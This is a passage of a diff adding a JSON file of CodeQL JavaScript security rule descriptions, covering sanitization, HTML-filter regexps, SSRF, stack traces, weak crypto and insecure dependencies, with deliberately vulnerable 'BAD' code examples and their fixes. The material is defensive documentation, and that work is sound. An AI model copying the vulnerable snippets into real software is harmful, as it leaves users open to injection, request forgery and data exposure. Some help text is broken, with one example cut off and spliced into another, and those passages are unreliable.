Many other sanitization libraries are available from npm and other sources.\n\nIf this is not an option, `escapeQuotes` should be rewritten to use a regular expression with the `g` (\"global\") flag instead:\n\n\n```javascript\nfunction escapeQuotes(s) {\n return s.replace(/'/g, \"''\");\n}\n\n```\nNote that it is very important to include the global flag: `s.replace(/'/, \"''\")` *without* the global flag is equivalent to the first example above and only replaces the first quote.\n\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [sqlstring](https://www.npmjs.com/package/sqlstring) package.\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116" ], + "description" : "A string transformer that does not replace or escape all occurrences of a\n meta-character may be ineffective.", + "id" : "js/incomplete-sanitization", + "kind" : "problem", + "name" : "Incomplete string escaping or encoding", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/incomplete-multi-character-sanitization", + "name" : "js/incomplete-multi-character-sanitization", + "shortDescription" : { + "text" : "Incomplete multi-character sanitization" + }, + "fullDescription" : { + "text" : "A sanitizer that removes a sequence of characters may reintroduce the dangerous sequence." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. 
For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n", + "markdown" : "# Bad HTML filtering regexp\nIt is possible to match some single HTML tags using regular expressions (parsing general HTML using regular expressions is impossible). 
However, if the regular expression is not written well it might be possible to circumvent it, which can lead to cross-site scripting or other security issues.\n\nSome of these mistakes are caused by browsers having very forgiving HTML parsers, and will often render invalid HTML containing syntax errors. Regular expressions that attempt to match HTML should also recognize tags containing such syntax errors.\n\n\n## Recommendation\nUse a well-tested sanitization or parser library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation.\n\n\n## Example\nThe following example attempts to filters out all `` as script end tags, but also tags such as `` even though it is a parser error. This means that an attack string such as `` will not be filtered by the function, and `alert(1)` will be executed by a browser if the string is rendered as HTML.\n\nOther corner cases include that HTML comments can end with `--!>`, and that HTML tag names can contain upper case characters.\n\n\n## References\n* Securitum: [The Curious Case of Copy & Paste](https://research.securitum.com/the-curious-case-of-copy-paste/).\n* stackoverflow.com: [You can't parse \\[X\\]HTML with regex](https://stackoverflow.com/questions/1732348/regex-match-open-tags-except-xhtml-self-contained-tags#answer-1732454).\n* HTML Standard: [Comment end bang state](https://html.spec.whatwg.org/multipage/parsing.html#comment-end-bang-state).\n* stackoverflow.com: [Why aren't browsers strict about HTML?](https://stackoverflow.com/questions/25559999/why-arent-browsers-strict-about-html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n* Common Weakness Enumeration: [CWE-80](https://cwe.mitre.org/data/definitions/80.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common 
Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" + }, + "properties" : { + "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], + "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", + "id" : "js/bad-tag-filter", + "kind" : "problem", + "name" : "Bad HTML filtering regexp", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.8" + } + }, { + "id" : "js/tainted-format-string", + "name" : "js/tainted-format-string", + "shortDescription" : { + "text" : "Use of externally-controlled format string" + }, + "fullDescription" : { + "text" : "Using external input in format strings can lead to garbled output." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. 
The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n", + "markdown" : "# Use of externally-controlled format string\nFunctions like the Node.js standard library function `util.format` accept a format string that is used to format the remaining arguments by providing inline format specifiers. 
If the format string contains unsanitized input from an untrusted source, then that string may contain unexpected format specifiers that cause garbled output.\n\n\n## Recommendation\nEither sanitize the input before including it in the format string, or use a `%s` specifier in the format string, and pass the untrusted data as corresponding argument.\n\n\n## Example\nThe following program snippet logs information about an unauthorized access attempt. The log message includes the user name, and the user's IP address is passed as an additional argument to `console.log` to be appended to the message:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by \" + user, ip);\n});\n\n```\nHowever, if a malicious user provides `%d` as their user name, `console.log` will instead attempt to format the `ip` argument as a number. Since IP addresses are not valid numbers, the result of this conversion is `NaN`. 
The resulting log message will read \"Unauthorized access attempt by NaN\", missing all the information that it was trying to log in the first place.\n\nInstead, the user name should be included using the `%s` specifier:\n\n\n```javascript\nconst app = require(\"express\")();\n\napp.get(\"unauthorized\", function handler(req, res) {\n let user = req.query.user;\n let ip = req.connection.remoteAddress;\n console.log(\"Unauthorized access attempt by %s\", user, ip);\n});\n\n```\n\n## References\n* Node.js Documentation: [util.format](https://nodejs.org/api/util.html#util_util_format_format_args).\n* Common Weakness Enumeration: [CWE-134](https://cwe.mitre.org/data/definitions/134.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-134" ], + "description" : "Using external input in format strings can lead to garbled output.", + "id" : "js/tainted-format-string", + "kind" : "path-problem", + "name" : "Use of externally-controlled format string", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.3" + } + }, { + "id" : "js/request-forgery", + "name" : "js/request-forgery", + "shortDescription" : { + "text" : "Server-side request forgery" + }, + "fullDescription" : { + "text" : "Making a network request with user-controlled data in the URL allows for request forgery attacks." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. 
A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. 
For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n", + "markdown" : "# Server-side request forgery\nDirectly incorporating user input in the URL of an outgoing HTTP request can enable a request forgery attack, in which the request is altered to target an unintended API endpoint or resource. If the server performing the request is connected to an internal network, this can give an attacker the means to bypass the network boundary and make requests against internal services. 
A forged request may perform an unintended action on behalf of the attacker, or cause information leak if redirected to an external server or if the request response is fed back to the user. It may also compromise the server making the request, if the request response is handled in an unsafe way.\n\n\n## Recommendation\nRestrict user inputs in the URL of an outgoing request, in particular:\n\n* Avoid user input in the hostname of the URL. Pick the hostname from an allow-list instead of constructing it directly from user input.\n* Take care when user input is part of the pathname of the URL. Restrict the input so that path traversal (\"`../`\") cannot be used to redirect the request to an unintended endpoint.\n\n## Example\nThe following example shows an HTTP request parameter being used directly in the URL of a request without validating the input, which facilitates an SSRF attack. The request `http.get(...)` is vulnerable since attackers can choose the value of `target` to be anything they want. 
For instance, the attacker can choose `\"internal.example.com/#\"` as the target, causing the URL used in the request to be `\"https://internal.example.com/#.example.com/data\"`.\n\nA request to `https://internal.example.com` may be problematic if that server is not meant to be directly accessible from the attacker's machine.\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n // BAD: `target` is controlled by the attacker\n http.get('https://' + target + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\nOne way to remedy the problem is to use the user input to select a known fixed string before performing the request:\n\n\n```javascript\nimport http from 'http';\n\nconst server = http.createServer(function(req, res) {\n const target = new URL(req.url, \"http://example.com\").searchParams.get(\"target\");\n\n let subdomain;\n if (target === 'EU') {\n subdomain = \"europe\"\n } else {\n subdomain = \"world\"\n }\n\n // GOOD: `subdomain` is controlled by the server\n http.get('https://' + subdomain + \".example.com/data/\", res => {\n // process request response ...\n });\n\n});\n\n```\n\n## References\n* OWASP: [SSRF](https://www.owasp.org/index.php/Server_Side_Request_Forgery)\n* Common Weakness Enumeration: [CWE-918](https://cwe.mitre.org/data/definitions/918.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-918" ], + "description" : "Making a network request with user-controlled data in the URL allows for request forgery attacks.", + "id" : "js/request-forgery", + "kind" : "path-problem", + "name" : "Server-side request forgery", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "9.1" + } + }, { + "id" : "js/stack-trace-exposure", + "name" : "js/stack-trace-exposure", + "shortDescription" : { + "text" : "Information exposure 
through a stack trace" + }, + "fullDescription" : { + "text" : "Propagating stack trace information to an external user can unintentionally reveal implementation details that are useful to an attacker for developing a subsequent exploit." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. 
As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n", + "markdown" : "# Information exposure through a stack trace\nSoftware developers often add stack traces to error messages, as a debugging aid. Whenever that error message occurs for an end user, the developer can use the stack trace to help identify how to fix the problem. 
In particular, stack traces can tell the developer more about the sequence of events that led to a failure, as opposed to merely the final state of the software when the error occurred.\n\nUnfortunately, the same information can be useful to an attacker. The sequence of function names in a stack trace can reveal the structure of the application as well as any internal components it relies on. Furthermore, the error message at the top of a stack trace can include information such as server-side file names and SQL code that the application relies on, allowing an attacker to fine-tune a subsequent injection attack.\n\n\n## Recommendation\nSend the user a more generic error message that reveals less information. Either suppress the stack trace entirely, or log it only on the server.\n\n\n## Example\nIn the following example, an exception is caught and its stack trace is sent back to the remote user as part of the HTTP response. As such, the user is able to see a detailed stack trace, which may contain sensitive information.\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n res.end(err.stack); // NOT OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\nInstead, the stack trace should be logged only on the server. 
That way, the developers can still access and use the error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n var body;\n try {\n body = handleRequest(req);\n }\n catch (err) {\n res.statusCode = 500;\n res.setHeader(\"Content-Type\", \"text/plain\");\n log(\"Exception occurred\", err.stack);\n res.end(\"An exception occurred\"); // OK\n return;\n }\n res.statusCode = 200;\n res.setHeader(\"Content-Type\", \"application/json\");\n res.setHeader(\"Content-Length\", body.length);\n res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-209", "external/cwe/cwe-497" ], + "description" : "Propagating stack trace information to an external user can\n unintentionally reveal implementation details that are useful\n to an attacker for developing a subsequent exploit.", + "id" : "js/stack-trace-exposure", + "kind" : "path-problem", + "name" : "Information exposure through a stack trace", + "precision" : "very-high", + "problem.severity" : "warning", + "security-severity" : "5.4" + } + }, { + "id" : "js/weak-cryptographic-algorithm", + "name" : "js/weak-cryptographic-algorithm", + "shortDescription" : { + "text" : "Use of a broken or weak cryptographic algorithm" + }, + "fullDescription" : { + "text" : "Using broken or weak cryptographic algorithms can compromise security." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* 
Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n", + "markdown" : "# Use of a broken or weak cryptographic algorithm\nUsing broken or weak cryptographic algorithms can leave data vulnerable to being decrypted or forged by an attacker.\n\nMany cryptographic algorithms provided by cryptography libraries are known to be weak, or flawed. Using such an algorithm means that encrypted or hashed data is less secure than it appears to be.\n\n\n## Recommendation\nEnsure that you use a strong, modern cryptographic algorithm. Use at least AES-128 or RSA-2048 for encryption, and SHA-2 or SHA-3 for secure hashing.\n\n\n## Example\nThe following code shows an example of using the builtin cryptographic library of NodeJS to encrypt some secret data. When creating a `Cipher` instance to encrypt the secret data with, you must specify the encryption algorithm to use. The first example uses DES, which is an older algorithm that is now considered weak. 
The second example uses AES, which is a strong modern algorithm.\n\n\n```javascript\nconst crypto = require('crypto');\n\nvar secretText = obj.getSecretText();\n\nconst desCipher = crypto.createCipher('des', key);\nlet desEncrypted = desCipher.write(secretText, 'utf8', 'hex'); // BAD: weak encryption\n\nconst aesCipher = crypto.createCipher('aes-128', key);\nlet aesEncrypted = aesCipher.update(secretText, 'utf8', 'hex'); // GOOD: strong encryption\n\n```\n\n## References\n* NIST, FIPS 140 Annex a: [ Approved Security Functions](http://csrc.nist.gov/publications/fips/fips140-2/fips1402annexa.pdf).\n* NIST, SP 800-131A: [ Transitions: Recommendation for Transitioning the Use of Cryptographic Algorithms and Key Lengths](http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-131Ar1.pdf).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n* Common Weakness Enumeration: [CWE-328](https://cwe.mitre.org/data/definitions/328.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-327", "external/cwe/cwe-328" ], + "description" : "Using broken or weak cryptographic algorithms can compromise security.", + "id" : "js/weak-cryptographic-algorithm", + "kind" : "path-problem", + "name" : "Use of a broken or weak cryptographic algorithm", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/biased-cryptographic-random", + "name" : "js/biased-cryptographic-random", + "shortDescription" : { + "text" : "Creating biased random numbers from a cryptographically secure source." + }, + "fullDescription" : { + "text" : "Some mathematical operations on random numbers can cause bias in the results and compromise security." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n", + "markdown" : "# Creating biased random numbers from a cryptographically secure source.\nGenerating secure random numbers can be an important part of creating a secure software system. This can be done using APIs that create cryptographically secure random numbers.\n\nHowever, using some mathematical operations on these cryptographically secure random numbers can create biased results, where some outcomes are more likely than others. 
Such biased results can make it easier for an attacker to guess the random numbers, and thereby break the security of the software system.\n\n\n## Recommendation\nBe very careful not to introduce bias when performing mathematical operations on cryptographically secure random numbers.\n\nIf possible, avoid performing mathematical operations on cryptographically secure random numbers at all, and use a preexisting library instead.\n\n\n## Example\nThe example below uses the modulo operator to create an array of 10 random digits using random bytes as the source for randomness.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nfor (let i = 0; i < 10; i++) {\n digits.push(crypto.randomBytes(1)[0] % 10); // NOT OK\n}\n```\nThe random byte is a uniformly random value between 0 and 255, and thus the result from using the modulo operator is slightly more likely to be between 0 and 5 than between 6 and 9.\n\nThe issue has been fixed in the code below by using a library that correctly generates cryptographically secure random values.\n\n\n```javascript\nconst cryptoRandomString = require('crypto-random-string');\n\nconst digits = cryptoRandomString({length: 10, type: 'numeric'});\n```\nAlternatively, the issue can be fixed by fixing the math in the original code. In the code below the random byte is discarded if the value is greater than or equal to 250. 
Thus the modulo operator is used on a uniformly random number between 0 and 249, which results in a uniformly random digit between 0 and 9.\n\n\n```javascript\nconst crypto = require('crypto');\n\nconst digits = [];\nwhile (digits.length < 10) {\n const byte = crypto.randomBytes(1)[0];\n if (byte >= 250) {\n continue;\n }\n digits.push(byte % 10); // OK\n}\n```\n\n## References\n* Stack Overflow: [Understanding “randomness”](https://stackoverflow.com/questions/3956478/understanding-randomness).\n* OWASP: [Insecure Randomness](https://owasp.org/www-community/vulnerabilities/Insecure_Randomness).\n* OWASP: [Rule - Use strong approved cryptographic algorithms](https://cheatsheetseries.owasp.org/cheatsheets/Cryptographic_Storage_Cheat_Sheet.html#rule---use-strong-approved-authenticated-encryption).\n* Common Weakness Enumeration: [CWE-327](https://cwe.mitre.org/data/definitions/327.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-327" ], + "description" : "Some mathematical operations on random numbers can cause bias in\n the results and compromise security.", + "id" : "js/biased-cryptographic-random", + "kind" : "problem", + "name" : "Creating biased random numbers from a cryptographically secure source.", + "precision" : "high", + "problem.severity" : "warning", + "security-severity" : "7.5" + } + }, { + "id" : "js/insecure-dependency", + "name" : "js/insecure-dependency", + "shortDescription" : { + "text" : "Dependency download using unencrypted communication channel" + }, + "fullDescription" : { + "text" : "Using unencrypted protocols to fetch dependencies can leave an application open to man-in-the-middle attacks." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "warning" + }, + "help" : { + "text" : "# Dependency download using unencrypted communication channel\nUsing an insecure protocol like HTTP or FTP to download build dependencies makes the build process vulnerable to a man-in-the-middle (MITM) attack.\n\nThis can allow attackers to inject malicious code into the downloaded dependencies, and thereby infect the build artifacts and execute arbitrary code on the machine building the artifacts.\n\n\n## Recommendation\nAlways use a secure protocol, such as HTTPS or SFTP, when downloading artifacts from an URL.\n\n\n## Example\nThe below example shows a `package.json` file that downloads a dependency using the insecure HTTP protocol.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"http://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\nThe fix is to change the protocol to HTTPS.\n\n\n```json\n{\n \"name\": \"example-project\",\n \"dependencies\": {\n \"unencrypted\": \"https://example.org/foo/tarball/release/0.0.1\",\n \"lodash\": \"^4.0.0\"\n }\n}\n```\n\n## References\n* Jonathan Leitschuh: [ Want to take over the Java ecosystem? All you need is a MITM! ](https://infosecwriteups.com/want-to-take-over-the-java-ecosystem-all-you-need-is-a-mitm-1fc329d898fb)\n* Max Veytsman: [ How to take over the computer of any Java (or Closure or Scala) Developer. 
